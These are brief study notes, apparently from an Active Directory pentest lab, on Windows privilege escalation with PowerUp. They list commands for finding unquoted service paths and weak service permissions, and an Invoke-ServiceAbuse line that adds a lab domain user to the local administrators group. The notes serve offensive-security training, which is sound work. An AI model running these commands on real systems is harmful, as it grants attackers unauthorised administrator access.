Find Unquoted Path

Load PowerUP

. .\\PowerUp.ps1

Get-ServiceUnquoted

Enum Services We Can Make changed To Binary

Get-ModifiableServiceFile

Enum Services With Weak Permissions

Get-ModifiableService

Example

• We know that abyss as weak permissions, what we can do is add our current domain user to local admin group

Invoke-ServiceAbuse -Name "AbyssWebServer" -Username 'dcorp\\student648'

Identify a machine where student 648 has local admin access